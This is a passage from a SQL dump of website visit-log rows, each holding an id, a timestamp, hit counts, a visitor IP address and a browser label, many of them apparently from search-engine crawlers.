2.4.117','firefox'),(565227,1663011210,1,1,0,0,'20.122.163.70','chrome'),(565228,1663048413,1,0,1,0,'66.249.66.61',''),(565229,1663055414,1,1,0,0,'194.38.20.161','other'),(565230,1663065399,1,1,0,0,'205.210.31.27','other'),(565231,1663069220,1,1,0,0,'207.46.13.51','other'),(565232,1663077111,1,1,0,0,'5.255.253.189','other'),(565233,1663078322,1,1,0,0,'87.250.224.127','other'),(565234,1663079963,1,1,0,0,'95.108.213.27','other'),(565235,1663096751,1,1,0,0,'95.108.213.21','other'),(565236,1663100393,1,1,0,0,'66.249.66.211','chrome'),(565237,1663117987,1,0,1,0,'66.249.66.129',''),(565238,1663121260,5,5,0,0,'3.139.237.220','chrome'),(565239,1663122753,1,1,0,0,'65.21.206.43','chrome'),(565240,1663134906,1,0,1,0,'66.249.66.57',''),(565241,1663155529,1,1,0,0,'66.249.66.82','chrome'),(565242,1663161863,1,1,0,0,'65.21.206.46','chrome'),(565243,1663163482,1,0,1,0,'66.249.66.7',''),(565244,1663166612,1,1,0,0,'95.108.213.21','other'),(565245,1663168628,1,1,0,0,'66.249.66.9','chrome'),(565246,1663171911,1,1,0,0,'107.178.207.87','chrome'),(565247,1663172034,1,1,0,0,'194.59.165.88','firefox'),(565248,1663174664,1,1,0,0,'194.38.20.161','other'),(565249,1663176468,1,1,0,0,'198.235.24.165','other'),(565250,1663179032,1,1,0,0,'198.235.24.55','other'),(565251,1663183639,1,1,0,0,'95.108.213.21','other'),(565252,1663184574,5,5,0,0,'40.120.62.113','chrome'),(565253,1663185325,1,1,0,0,'87.250.224.127','other'),(565254,1663186504,1,1,0,0,'87.250.224.127','other'),(565255,1663187990,1,1,0,0,'87.250.224.127','other'),(565256,1663189969,1,1,0,0,'205.210.31.15','other'),(565257,1663192013,1,1,0,0,'205.210.31.30','other'),(565258,1663193824,3,3,0,0,'147.78.47.249','chrome'),(565259,1663198082,1,1,0,0,'157.55.39.90','other'),(565260,1663198887,1,1,0,0,'205.210.31.178','other'),(565261,1663201067,1,1,0,0,'207.46.13.52','chrome'),(565262,1663202799,1,1,0,0,'205.210.31.155','other'),(565263,1663203137,1,1,0,0,'66.249.66.5','chrome'),(565264,1663205241,1,1,0,0,'205.210.31.40','other'),(565265,1663205275,1,1,0,0,'207.46.13.38','other'),(565266,1663206074,1,1,0,0,'198.235.24.13','other'),(565267,1663206230,1,0,1,0,'66.249.66.209',''),(565268,1663208344,1,1,0,0,'66.249.66.7','chrome'),(565269,1663208547,1,1,0,0,'95.108.213.21','other'),(565270,1663224007,1,1,0,0,'66.249.66.61','chrome'),(565271,1663226084,1,0,1,0,'66.249.66.59',''),(565272,1663227231,1,1,0,0,'87.250.224.41','other'),(565273,1663228204,1,1,0,0,'65.21.206.43','chrome'),(565274,1663232533,1,1,0,0,'66.249.66.59','chrome'),(565275,1663236923,2,2,0,0,'66.249.66.59','chrome'),(565276,1663240485,1,0,1,0,'66.249.66.57',''),(565277,1663242951,1,1,0,0,'87.250.224.127','other'),(565278,1663259384,1,1,0,0,'139.59.117.30','firefox'),(565279,1663259421,1,1,0,0,'66.249.66.84','chrome'),(565280,1663260348,1,1,0,0,'66.249.66.7','chrome'),(565281,1663261001,1,1,0,0,'66.249.66.82','chrome'),(565282,1663262034,1,1,0,0,'95.108.213.21','other'),(565283,1663270630,1,1,0,0,'65.21.206.45','chrome'),(565284,1663280115,1,1,0,0,'65.21.206.46','chrome'),(565285,1663283604,10,10,0,0,'5.189.183.89','chrome'),(565286,1663289127,1,1,0,0,'207.46.13.38','other'),(565287,1663291232,1,1,0,0,'66.249.66.159','chrome'),(565288,1663297757,1,1,0,0,'66.249.66.59','chrome'),(565289,1663309081,1,1,0,0,'194.38.20.161','other'),(565290,1663312207,1,0,1,0,'66.249.66.57',''),(565291,1663312605,1,1,0,0,'51.103.45.197','chrome'),(565292,1663312816,1,1,0,0,'207.46.13.38','other'),(565293,1663313293,1,1,0,0,'45.142.90.4','chrome'),(565294,1663315474,2,2,0,0,'185.74.5.84','chrome'),(565295,1663315704,1,1,0,0,'5.255.253.176','other'),(565296,1663321379,1,1,0,0,'18.237.193.233','chrome'),(565297,1663321381,1,1,0,0,'54.191.227.115','chrome'),(565298,1663321402,2,2,0,0,'35.92.207.253','chrome'),(565299,1663321406,2,2,0,0,'35.167.80.209','chrome'),(565300,1663323173,2,2,0,0,'144.91.106.14','chrome'),(565301,1663326344,1,1,0,0,'2.57.122.217','chrome'),(565302,1663326354,1,1,0,0,'2.57.122.217','other'),(565303,1663330995,1,1,0,0,'65.21.206.43','chrome'),(565304,1663335861,5,5,0,0,'159.223.196.15','chrome'),(565305,1663343533,1,1,0,0,'87.250.224.8','other'),(565306,1663347882,10,10,0,0,'5.189.177.69','chrome'),(565307,1663354471,1,1,0,0,'5.255.253.189','other'),(565308,1663355521,1,1,0,0,'5.45.207.154','other'),(565309,1663371089,1,1,0,0,'207.46.13.38','chrome'),(565310,1663381550,5,5,0,0,'18.117.132.186','chrome'),(565311,1663386269,1,1,0,0,'5.45.207.154','other'),(565312,1663389068,1,1,0,0,'207.46.13.47','other'),(565313,1663392727,1,1,0,0,'207.46.13.38','other'),(565314,1663397709,1,0,1,0,'66.249.66.57',''),(565315,1663398679,1,1,0,0,'20.111.29.83','chrome'),(565316,1663398881,1,1,0,0,'87.250.224.50','other'),(565317,1663400876,1,1,0,0,'31.13.127.4','other'),(565318,1663413474,1,1,0,0,'205.210.31.130','other'),(565319,1663418249,1,1,0,0,'66.249.66.83','chrome'),(565320,1663418846,1,1,0,0,'95.108.213.21','other'),(565321,1663419354,1,0,1,0,'66.249.66.59',''),(565322,1663423483,1,1,0,0,'95.108.213.21','other'),(565323,1663428041,1,1,0,0,'137.184.89.163','firefox'),(565324,1663428754,1,1,0,0,'87.250.224.164','other'),(565325,1663432054,1,0,1,0,'66.249.66.83',''),(565326,1663432160,1,1,0,0,'95.108.213.2','other'),(565327,1663449875,1,1,0,0,'207.46.13.52','other'),(565328,1663461923,1,1,0,0,'5.45.207.141','other'),(565329,1663465665,1,1,0,0,'65.21.206.43','chrome'),(565330,1663482532,1,0,1,0,'66.249.66.59',''),(565331,1663486122,1,1,0,0,'66.249.66.57','chrome'),(565332,1663490399,1,1,0,0,'66.249.66.61','chrome'),(565333,1663496454,1,1,0,0,'194.38.20.161','other'),(565334,1663496505,1,1,0,0,'205.210.31.139','other'),(565335,1663500071,1,1,0,0,'66.249.66.57','chrome'),(565336,1663504583,1,1,0,0,'5.255.253.189','other'),(565337,1663508328,1,1,0,0,'66.249.70.41','chrome'),(565338,1663516611,1,1,0,0,'185.237.217.21','chrome'),(565339,1663517638,1,1,0,0,'205.210.31.45','other'),(565340,1663525768,1,1,0,0,'157.55.39.90','other'),(565341,1663526980,1,1,0,0,'66.249.70.41','chrome'),(565342,1663537842,1,0,1,0,'66.249.70.41',''),(565343,1663544709,1,1,0,0,'196.44.176.39','firefox'),(565344,1663551006,1,0,1,0,'66.249.70.37',''),(565345,1663554685,1,1,0,0,'66.249.70.41','chrome'),(565346,1663556428,1,1,0,0,'87.250.224.87','other'),(565347,1663567725,2,2,0,0,'35.84.29.212','other'),(565348,1663567820,1,0,1,0,'66.249.70.37',''),(565349,1663570192,1,0,1,0,'66.249.70.39',''),(565350,1663570233,1,1,0,0,'66.249.70.39','chrome'),(565351,1663572121,1,1,0,0,'31.13.127.9','other'),(565352,1663572860,1,1,0,0,'95.108.213.21','other'),(565353,1663579872,1,1,0,0,'66.249.70.39','chrome'),(565354,1663582418,1,1,0,0,'34.215.240.252','chrome'),(565355,1663582446,2,2,0,0,'34.215.34.243','chrome'),(565356,1663582670,1,1,0,0,'34.218.248.119','chrome'),(565357,1663582699,2,2,0,0,'54.202.143.222','chrome'),(565358,1663583338,1,1,0,0,'35.91.203.103','chrome'),(565359,1663583359,2,2,0,0,'34.220.78.117','chrome'),(565360,1663586397,1,1,0,0,'207.46.13.69','chrome'),(565361,1663587111,3,3,0,0,'147.78.47.249','chrome'),(565362,1663596682,1,1,0,0,'87.250.224.127','other'),(565363,1663599796,1,0,1,0,'66.249.66.5',''),(565364,1663606755,1,1,0,0,'87.250.224.127','other'),(565365,1663608721,1,1,0,0,'87.250.224.127','other'),(565366,1663608787,1,1,0,0,'87.250.224.50','other'),(565367,1663609976,1,1,0,0,'198.235.24.143','other'),(565368,1663611894,1,1,0,0,'207.46.13.47','other'),(565369,1663613515,1,1,0,0,'194.38.20.161','other'),(565370,1663617275,1,1,0,0,'120.76.135.15','firefox'),(565371,1663619827,1,1,0,0,'207.46.13.52','other'),(565372,1663620142,1,1,0,0,'199.244.88.218','chrome'),(565373,1663633581,4,4,0,0,'167.94.138.44','other'),(565374,1663639687,1,1,0,0,'5.255.253.153','other'),(565375,1663646187,1,1,0,0,'207.46.13.47','other'),(565376,1663652234,1,1,0,0,'205.210.31.14','other'),(565377,1663658923,1,1,0,0,'207.46.13.52','other'),(565378,1663659334,1,0,1,0,'66.249.66.59',''),(565379,1663667113,1,1,0,0,'35.91.75.14','chrome'),(565380,1663667119,1,1,0,0,'34.217.178.49','chrome'),(565381,1663667129,2,2,0,0,'35.93.91.61','chrome'),(565382,1663667144,2,2,0,0,'35.92.149.219','chrome'),(565383,1663670608,1,1,0,0,'45.155.82.172','chrome'),(565384,1663680583,1,1,0,0,'95.108.213.21','other'),(565385,1663693854,1,1,0,0,'87.236.176.200','other'),(565386,1663697043,1,1,0,0,'65.21.206.45','chrome'),(565387,1663699900,1,1,0,0,'198.235.24.20','other'),(565388,1663704913,1,1,0,0,'87.250.224.136','other'),(565389,1663709834,1,1,0,0,'69.171.249.10','other'),(565390,1663712179,1,1,0,0,'65.21.206.43','chrome'),(565391,1663712909,1,1,0,0,'66.249.66.159','chrome'),(565392,1663719225,1,1,0,0,'207.46.13.52','other'),(565393,1663721505,1,0,1,0,'66.249.66.207',''),(565394,1663721717,1,1,0,0,'66.249.66.9','chrome'),(565395,1663723181,1,1,0,0,'66.249.66.61','chrome'),(565396,1663742914,1,1,0,0,'66.249.66.61','chrome'),(565397,1663745088,1,1,0,0,'194.38.20.161','other'),(565398,1663745594,1,0,1,0,'66.249.66.57',''),(565399,1663745854,1,0,1,0,'66.249.66.61',''),(565400,1663746419,1,1,0,0,'66.249.66.61','chrome'),(565401,1663747436,1,1,0,0,'207.46.13.52','other'),(565402,1663749104,1,0,1,0,'66.249.66.57',''),(565403,1663753306,1,1,0,0,'69.171.249.2','other'),(565404,1663753307,2,2,0,0,'69.171.249.24','other'),(565405,1663753789,1,1,0,0,'95.108.213.36','other'),(565406,1663756280,1,1,0,0,'205.169.39.50','chrome'),(565407,1663758173,1,0,1,0,'66.249.66.59',''),(565408,1663758247,1,1,0,0,'65.154.226.171','chrome'),(565409,1663762304,1,1,0,0,'66.249.66.7','chrome'),(565411,1663767985,2,2,0,0,'205.169.39.164','chrome'),(565412,1663768300,1,1,0,0,'205.169.39.34','chrome'),(565413,1663781039,1,1,0,0,'67.222.152.219','firefox'),(565414,1663792051,3,3,0,0,'20.10.20.66','other'),(565415,1663792379,1,1,0,0,'20.163.78.171','chrome'),(565416,1663793581,1,1,0,0,'66.249.66.5','chrome'),(565417,1663799415,1,1,0,0,'66.249.66.209','chrome'),(565418,1663799448,1,1,0,0,'95.108.213.70','other'),(565419,1663803371,1,0,1,0,'66.249.66.129',''),(565420,1663804047,1,1,0,0,'65.21.206.46','chrome'),(565421,1663807176,1,1,0,0,'87.250.224.118','other'),(565422,1663810118,1,1,0,0,'15.235.12.96','other'),(565423,1663812005,1,1,0,0,'5.45.207.146','other'),(565424,1663825956,1,1,0,0,'66.249.66.57','chrome'),(565425,1663829903,1,1,0,0,'207.46.13.38','other'),(565426,1663830001,1,1,0,0,'87.250.224.109','other'),(565427,1663830034,1,1,0,0,'5.255.231.249','other'),(565428,1663830069,1,1,0,0,'5.255.253.179','other'),(565429,1663832037,2,0,2,0,'66.249.66.57',''),(565430,1663835542,1,0,1,0,'66.249.66.57',''),(565431,1663864546,1,1,0,0,'194.38.20.161','other'),(565432,1663873216,2,1,1,0,'66.249.66.57',''),(565433,1663873222,1,0,1,0,'66.249.66.209',''),(565434,1663882274,1,1,0,0,'66.249.66.211','chrome'),(565435,1663887275,2,2,0,0,'185.81.157.128','firefox'),(565436,1663894110,1,1,0,0,'207.46.13.175','other'),(565437,1663907037,1,1,0,0,'207.46.13.47','other'),(565438,1663914910,12,12,0,0,'95.217.128.38','chrome'),(565439,1663918531,1,0,1,0,'66.249.66.59',''),(565440,1663920142,1,1,0,0,'185.81.158.132','other'),(565441,1663922641,1,0,1,0,'66.249.65.207',''),(565442,1663923507,1,1,0,0,'15.235.12.96','other'),(565443,1663925920,1,1,0,0,'207.46.13.38','other'),(565444,1663927689,1,0,1,0,'66.249.66.59',''),(565445,1663928074,1,1,0,0,'185.81.158.132','other'),(565446,1663938143,1,1,0,0,'66.249.66.59','chrome'),(565447,1663939882,1,1,0,0,'5.255.253.126','other'),(565448,1663944569,1,1,0,0,'173.252.83.12','other'),(565449,1663958624,1,1,0,0,'66.249.66.61','chrome'),(565450,1663963830,1,1,0,0,'66.249.66.209','chrome'),(565451,1663980427,1,1,0,0,'119.8.58.8','chrome'),(565452,1663981148,1,1,0,0,'66.249.66.59','chrome'),(565453,1663988208,1,1,0,0,'213.180.203.5','other'),(565454,1663991517,1,1,0,0,'66.249.66.211','chrome'),(565455,1664001555,1,1,0,0,'194.38.20.161','other'),(565456,1664002644,1,1,0,0,'66.249.66.61','chrome'),(565457,1664008752,1,0,1,0,'66.249.66.57',''),(565458,1664012771,1,1,0,0,'34.219.84.40','chrome'),(565459,1664012784,2,2,0,0,'35.91.149.122','chrome'),(565460,1664019596,1,1,0,0,'87.250.224.199','other'),(565461,1664022590,1,1,0,0,'40.114.148.8','chrome'),(565462,1664028485,1,1,0,0,'13.90.194.70','other'),(565463,1664029816,1,1,0,0,'207.46.13.175','other'),(565464,1664034132,1,1,0,0,'95.108.213.6','other'),(565465,1664038241,1,1,0,0,'95.108.213.62','other'),(565466,1664040832,1,1,0,0,'176.124.134.246','chrome'),(565467,1664045572,1,1,0,0,'185.181.60.189','chrome'),(565468,1664056411,1,1,0,0,'87.250.224.7','other'),(565469,1664062088,1,0,1,0,'66.249.66.61',''),(565470,1664064400,1,1,0,0,'87.250.224.187','other'),(565471,1664064902,1,1,0,0,'216.145.14.142','firefox'),(565472,1664070227,1,1,0,0,'205.210.31.146','other'),(565473,1664081358,1,1,0,0,'87.250.224.118','other'),(565474,1664090782,4,4,0,0,'193.29.220.11','chrome'),(565475,1664103659,1,0,1,0,'66.249.66.57',''),(565476,1664105131,1,1,0,0,'66.249.66.59','chrome'),(565477,1664107029,1,1,0,0,'213.180.203.5','other'),(565478,1664115388,1,1,0,0,'198.235.24.60','other'),(565479,1664122948,1,1,0,0,'54.245.186.11','firefox'),(565480,1664123253,1,1,0,0,'207.46.13.50','other'),(565481,1664132606,1,1,0,0,'194.38.20.161','other'),(565482,1664135739,1,1,0,0,'87.250.224.96','other'),(565483,1664135873,1,1,0,0,'5.255.253.126','other'),(565484,1664142480,1,1,0,0,'207.46.13.130','chrome'),(565485,1664148048,1,1,0,0,'5.255.253.110','other'),(565486,1664150865,1,1,0,0,'207.46.13.69','other'),(565487,1664156955,1,1,0,0,'87.250.224.93','other'),(565488,1664162431,1,1,0,0,'5.161.129.143','chrome'),(565489,1664165202,1,1,0,0,'46.8.141.131','chrome'),(565490,1664172594,1,0,1,0,'66.249.66.57',''),(565491,1664175884,1,1,0,0,'5.255.231.249','other'),(565492,1664175888,1,1,0,0,'95.108.213.14','other'),(565493,1664177458,1,1,0,0,'66.249.66.59','chrome'),(565494,1664180376,1,0,1,0,'66.249.66.61',''),(565495,1664188738,1,1,0,0,'66.249.66.61','chrome'),(565496,1664189984,1,1,0,0,'66.249.66.59','chrome'),(565497,1664190308,1,0,1,0,'66.249.66.57',''),(565498,1664204673,1,1,0,0,'5.255.231.104','other'),(565499,1664209057,1,1,0,0,'207.46.13.130','chrome'),(565500,1664216285,1,1,0,0,'150.230.247.143','firefox'),(565501,1664220350,1,1,0,0,'87.250.224.174','other'),(565502,1664223356,1,1,0,0,'66.249.66.199','chrome'),(565503,1664230382,1,1,0,0,'87.250.224.118','other'),(565504,1664232878,1,1,0,0,'213.180.203.5','other'),(565505,1664235383,1,1,0,0,'66.249.66.9','chrome'),(565506,1664238520,1,1,0,0,'95.108.213.13','other'),(565507,1664239574,1,1,0,0,'66.249.66.9','chrome'),(565508,1664240798,1,1,0,0,'66.249.66.207','chrome'),(565509,1664243004,1,0,1,0,'66.249.66.61',''),(565510,1664244247,1,0,1,0,'66.249.66.7',''),(565511,1664247004,1,0,1,0,'66.249.66.5',''),(565512,1664251667,1,1,0,0,'95.108.213.62','other'),(565513,1664255931,1,1,0,0,'87.250.224.93','other'),(565514,1664258591,1,1,0,0,'194.38.20.161','other'),(565515,1664259176,1,1,0,0,'87.250.224.93','other'),(565516,1664259765,1,1,0,0,'207.46.13.130','other'),(565517,1664260253,1,1,0,0,'87.250.224.7','other'),(565518,1664262103,1,1,0,0,'95.108.213.42','other'),(565519,1664265708,1,1,0,0,'65.21.206.44','chrome'),(565520,1664267007,1,1,0,0,'66.249.66.7','chrome'),(565521,1664267934,1,1,0,0,'198.235.24.44','other'),(565522,1664272309,1,0,1,0,'66.249.66.207',''),(565523,1664272923,3,3,0,0,'147.78.47.249','chrome'),(565524,1664279329,1,1,0,0,'198.235.24.181','other'),(565525,1664285921,2,2,0,0,'91.196.178.169','chrome'),(565526,1664297131,1,1,0,0,'45.43.14.76','firefox'),(565527,1664299012,1,1,0,0,'31.13.127.16','other'),(565528,1664301013,1,1,0,0,'77.88.5.133','other'),(565529,1664305266,1,1,0,0,'77.88.5.133','other'),(565530,1664306314,1,1,0,0,'66.249.66.207','chrome'),(565531,1664317701,1,1,0,0,'66.249.66.61','chrome'),(565532,1664319081,1,1,0,0,'66.249.66.57','chrome'),(565533,1664328721,1,1,0,0,'77.88.5.227','other'),(565534,1664331497,5,5,0,0,'18.188.231.184','chrome'),(565535,1664331500,48,48,0,0,'208.110.73.250','other'),(565536,1664331555,11,11,0,0,'208.110.73.250','chrome'),(565537,1664343174,1,1,0,0,'77.88.5.133','other'),(565538,1664344781,1,0,1,0,'66.249.66.61',''),(565539,1664349481,1,0,1,0,'66.249.66.57',''),(565540,1664351664,1,0,1,0,'66.249.66.59',''),(565541,1664352316,1,1,0,0,'207.46.13.38','other'),(565542,1664358253,1,1,0,0,'52.88.241.203','chrome'),(565543,1664358255,1,1,0,0,'54.188.114.23','chrome'),(565544,1664358272,1,1,0,0,'35.91.37.136','chrome'),(565545,1664364960,1,1,0,0,'77.88.5.133','other'),(565546,1664366428,1,1,0,0,'91.196.178.169','chrome'),(565547,1664369063,1,0,1,0,'66.249.66.83',''),(565548,1664374374,1,1,0,0,'207.46.13.38','other'),(565549,1664384445,1,1,0,0,'213.136.93.169','firefox'),(565550,1664389893,1,1,0,0,'194.38.20.161','other'),(565551,1664390316,1,0,1,0,'66.249.66.159',''),(565552,1664402937,1,1,0,0,'100.20.87.165','chrome'),(565553,1664404476,5,5,0,0,'45.55.225.1','chrome'),(565554,1664406379,1,1,0,0,'66.249.66.159','chrome'),(565555,1664407555,1,1,0,0,'66.249.66.82','chrome'),(565556,1664409571,1,1,0,0,'66.249.66.7','chrome'),(565557,1664415041,1,1,0,0,'66.249.66.209','chrome'),(565558,1664417144,1,1,0,0,'66.249.66.59','chrome'),(565559,1664419044,1,1,0,0,'207.46.13.130','other'),(565560,1664420904,1,0,1,0,'66.249.66.5',''),(565561,1664436720,1,0,1,0,'66.249.66.61',''),(565562,1664443344,1,1,0,0,'34.221.106.4','chrome'),(565563,1664443418,2,2,0,0,'35.93.8.87','chrome'),(565564,1664443490,1,1,0,0,'35.86.131.121','chrome'),(565565,1664443652,2,2,0,0,'54.69.67.238','chrome'),(565566,1664444406,1,1,0,0,'95.108.213.34','other'),(565567,1664447136,1,1,0,0,'66.249.66.57','chrome'),(565568,1664453963,1,1,0,0,'207.46.13.130','other'),(565569,1664473665,1,1,0,0,'66.249.66.83','chrome'),(565570,1664473745,1,1,0,0,'5.58.187.240','chrome'),(565571,1664474334,1,1,0,0,'207.46.13.130','other'),(565572,1664479478,1,1,0,0,'66.249.66.158','chrome'),(565573,1664487088,1,1,0,0,'109.233.192.83','firefox'),(565574,1664509813,1,1,0,0,'92.53.96.193','chrome'),(565575,1664521494,1,0,1,0,'66.249.66.61',''),(565576,1664521742,1,1,0,0,'198.235.24.43','other'),(565577,1664533266,1,1,0,0,'31.13.127.8','other'),(565578,1664559128,3,3,0,0,'147.78.47.249','chrome'),(565579,1664564780,1,1,0,0,'5.45.207.135','other'),(565580,1664564962,1,1,0,0,'87.250.224.163','other'),(565581,1664566627,1,1,0,0,'46.211.158.204','chrome'),(565582,1664581919,1,1,0,0,'205.210.31.24','other'),(565583,1664585947,1,1,0,0,'207.46.13.130','other'),(565584,1664589861,1,1,0,0,'66.249.66.61','chrome'),(565585,1664590098,1,1,0,0,'205.210.31.25','other'),(565586,1664606243,1,0,1,0,'66.249.66.59',''),(565587,1664610423,1,1,0,0,'173.252.83.118','other'),(565588,1664616620,1,1,0,0,'35.93.64.112','chrome'),(565589,1664616695,1,1,0,0,'34.208.204.157','chrome'),(565590,1664616709,2,2,0,0,'35.91.155.13','chrome'),(565591,1664616822,1,1,0,0,'34.209.240.61','chrome'),(565592,1664617827,3,3,0,0,'20.163.59.149','other'),(565593,1664635992,1,1,0,0,'66.249.66.61','chrome'),(565594,1664638088,1,1,0,0,'52.166.207.241','chrome'),(565595,1664641460,1,1,0,0,'66.249.66.84','chrome'),(565596,1664641467,1,0,1,0,'66.249.66.5',''),(565597,1664645820,1,1,0,0,'66.249.66.83','chrome'),(565598,1664649129,1,1,0,0,'69.171.249.24','other'),(565599,1664668746,1,1,0,0,'66.249.66.207','chrome'),(565600,1664682116,2,2,0,0,'2.57.122.18','chrome'),(565601,1664690904,1,1,0,0,'66.249.66.61','chrome'),(565602,1664691072,1,0,1,0,'66.249.66.59',''),(565603,1664692628,1,0,1,0,'66.249.66.57',''),(565604,1664696432,3,3,0,0,'147.78.47.249','chrome'),(565605,1664702506,1,1,0,0,'176.105.200.234','chrome'),(565606,1664703681,1,1,0,0,'35.87.111.212','chrome'),(565607,1664703689,1,1,0,0,'54.214.222.216','chrome'),(565608,1664703726,1,1,0,0,'54.201.8.136','chrome'),(565609,1664703730,1,1,0,0,'18.236.84.17','chrome'),(565610,1664704024,1,1,0,0,'207.46.13.38','other'),(565611,1664715701,1,1,0,0,'185.39.144.147','other'),(565612,1664732304,1,1,0,0,'20.172.41.155','other'),(565613,1664737470,1,1,0,0,'178.128.54.239','firefox'),(565614,1664749181,1,0,1,0,'66.249.66.82',''),(565615,1664777144,1,1,0,0,'162.0.223.11','other'),(565616,1664779710,1,0,1,0,'66.249.66.59',''),(565617,1664785426,2,2,0,0,'20.14.89.45','chrome'),(565618,1664791009,1,1,0,0,'50.112.237.153','chrome'),(565619,1664791023,2,2,0,0,'35.90.164.144','chrome'),(565620,1664791244,1,1,0,0,'35.88.149.224','chrome'),(565621,1664791267,1,1,0,0,'54.200.209.138','chrome'),(565622,1664796993,1,1,0,0,'138.197.1.56','other'),(565623,1664797960,1,1,0,0,'159.89.81.160','chrome'),(565624,1664807012,1,0,1,0,'66.249.66.209',''),(565625,1664807053,1,1,0,0,'66.249.66.84','chrome'),(565626,1664812921,4,4,0,0,'20.214.176.197','other'),(565627,1664841023,1,1,0,0,'66.249.66.82','chrome'),(565628,1664842136,1,1,0,0,'66.220.149.18','other'),(565629,1664845730,1,1,0,0,'205.210.31.55','other'),(565630,1664850437,48,48,0,0,'142.54.177.2','other'),(565631,1664850445,1,1,0,0,'31.13.103.24','other'),(565632,1664850453,11,11,0,0,'142.54.177.2','chrome'),(565633,1664865705,2,0,2,0,'66.249.66.59',''),(565634,1664866378,1,1,0,0,'87.250.224.108','other'),(565635,1664890746,1,1,0,0,'46.211.91.215','chrome'),(565636,1664895027,1,1,0,0,'66.249.66.129','chrome'),(565637,1664899081,1,1,0,0,'66.249.66.9','chrome'),(565638,1664901045,1,1,0,0,'95.108.213.68','other'),(565639,1664904834,1,1,0,0,'95.217.179.23','firefox'),(565640,1664908686,1,1,0,0,'185.46.121.66','firefox'),(565641,1664910070,1,0,1,0,'66.249.66.207',''),(565642,1664910576,1,1,0,0,'65.108.148.119','firefox'),(565643,1664919760,1,1,0,0,'65.108.151.137','firefox'),(565644,1664923176,1,1,0,0,'95.217.32.126','firefox'),(565645,1664936767,1,1,0,0,'65.108.148.119','firefox'),(565646,1664937619,1,1,0,0,'82.193.104.168','other'),(565647,1664947222,1,1,0,0,'207.46.13.32','other'),(565648,1664948440,1,1,0,0,'207.46.13.38','other'),(565649,1664952046,1,0,1,0,'66.249.66.57',''),(565650,1664957615,1,1,0,0,'66.249.66.57','chrome'),(565651,1664960223,3,3,0,0,'13.237.206.165','chrome'),(565652,1664960224,1,1,0,0,'13.237.206.165','other'),(565653,1664960225,1,1,0,0,'13.237.206.165','other'),(565654,1664960563,1,1,0,0,'185.181.60.39','chrome'),(565655,1664962438,1,1,0,0,'87.250.224.100','other'),(565656,1664962929,1,1,0,0,'34.221.83.238','chrome'),(565657,1664962943,1,1,0,0,'54.185.46.244','chrome'),(565658,1664962950,2,2,0,0,'35.93.59.213','chrome'),(565659,1664962968,2,2,0,0,'34.217.89.62','chrome'),(565660,1664966451,1,1,0,0,'141.43.203.226','firefox'),(565661,1664975005,2,2,0,0,'91.196.178.169','chrome'),(565662,1664986815,3,3,0,0,'147.78.47.249','chrome'),(565663,1664992699,1,1,0,0,'216.158.230.167','firefox'),(565664,1665005917,2,2,0,0,'87.250.224.100','other'),(565665,1665019267,5,5,0,0,'23.97.205.210','chrome'),(565666,1665032523,1,1,0,0,'66.249.66.57','chrome'),(565667,1665033517,1,1,0,0,'87.250.224.100','other'),(565668,1665034741,1,1,0,0,'66.249.66.57','chrome'),(565669,1665035962,1,0,1,0,'66.249.66.61',''),(565670,1665038470,1,0,1,0,'66.249.66.61',''),(565671,1665050852,2,2,0,0,'54.214.222.35','chrome'),(565672,1665050855,1,1,0,0,'35.91.1.128','chrome'),(565673,1665050878,1,1,0,0,'52.40.121.141','chrome'),(565674,1665050881,1,1,0,0,'35.92.246.141','chrome'),(565675,1665050934,2,2,0,0,'34.218.230.215','chrome'),(565676,1665051042,1,1,0,0,'35.89.9.40','chrome'),(565677,1665051067,2,2,0,0,'34.216.99.189','chrome'),(565678,1665051153,4,4,0,0,'18.237.147.61','chrome'),(565679,1665051395,1,1,0,0,'54.212.236.74','chrome'),(565680,1665051494,2,2,0,0,'54.149.250.230','chrome'),(565681,1665051504,1,1,0,0,'35.92.99.119','chrome'),(565682,1665051532,2,2,0,0,'34.220.20.73','chrome'),(565683,1665057586,1,1,0,0,'81.88.52.218','chrome'),(565684,1665060007,7,7,0,0,'195.3.222.14','chrome'),(565685,1665060499,1,0,1,0,'66.249.66.61',''),(565686,1665071415,1,1,0,0,'87.250.224.100','other'),(565687,1665075042,1,1,0,0,'187.195.110.47','chrome'),(565688,1665078078,1,1,0,0,'87.250.224.100','other'),(565689,1665123168,1,0,1,0,'66.249.66.59',''),(565690,1665148793,1,1,0,0,'194.44.203.5','chrome'),(565691,1665155389,1,1,0,0,'66.249.66.59','chrome'),(565692,1665156756,1,1,0,0,'194.38.20.161','other'),(565693,1665174451,1,1,0,0,'187.195.110.47','firefox'),(565694,1665175080,1,1,0,0,'207.46.13.32','other'),(565695,1665186511,1,1,0,0,'34.128.123.85','other'),(565696,1665205213,1,1,0,0,'66.249.66.61','chrome'),(565697,1665207876,1,0,1,0,'66.249.66.57',''),(565698,1665212958,1,1,0,0,'45.220.2.116','other'),(565699,1665213345,1,1,0,0,'159.89.36.60','other'),(565700,1665215184,1,1,0,0,'167.172.23.246','other'),(565701,1665223365,1,1,0,0,'18.237.88.62','chrome'),(565702,1665223367,1,1,0,0,'35.91.191.42','chrome'),(565703,1665223383,2,2,0,0,'35.87.96.182','chrome'),(565704,1665223385,2,2,0,0,'34.215.234.75','chrome'),(565705,1665224210,1,1,0,0,'87.250.224.107','other'),(565706,1665224323,2,2,0,0,'34.219.248.57','chrome'),(565707,1665239225,1,1,0,0,'198.235.24.134','other'),(565708,1665245391,1,1,0,0,'67.205.143.236','firefox'),(565709,1665245493,2,2,0,0,'20.219.22.116','chrome'),(565710,1665256567,41,41,0,0,'20.118.162.64','chrome'),(565711,1665272234,3,3,0,0,'20.113.153.85','other'),(565712,1665276048,1,1,0,0,'87.250.224.125','other'),(565713,1665278842,3,3,0,0,'185.81.157.128','other'),(565714,1665278922,1,1,0,0,'205.210.31.2','other'),(565715,1665291227,1,0,1,0,'66.249.66.57',''),(565716,1665294322,1,0,1,0,'66.249.66.61',''),(565717,1665294639,1,1,0,0,'194.38.20.161','other'),(565718,1665299283,1,1,0,0,'207.46.13.130','other'),(565719,1665300667,2,2,0,0,'31.13.127.18','other'),(565720,1665307079,1,1,0,0,'87.250.224.167','other'),(565721,1665320219,1,1,0,0,'87.250.224.12','other'),(565722,1665320572,1,1,0,0,'91.196.178.41','chrome'),(565723,1665321865,1,1,0,0,'5.45.207.98','other'),(565724,1665330916,1,1,0,0,'66.249.66.59','chrome'),(565725,1665331670,1,1,0,0,'87.250.224.35','other'),(565726,1665333709,1,1,0,0,'95.108.213.52','other'),(565727,1665336432,1,0,1,0,'66.249.66.57',''),(565728,1665337687,1,1,0,0,'5.45.207.98','other'),(565729,1665339084,1,0,1,0,'66.249.66.57',''),(565730,1665340279,1,1,0,0,'87.250.224.14','other'),(565731,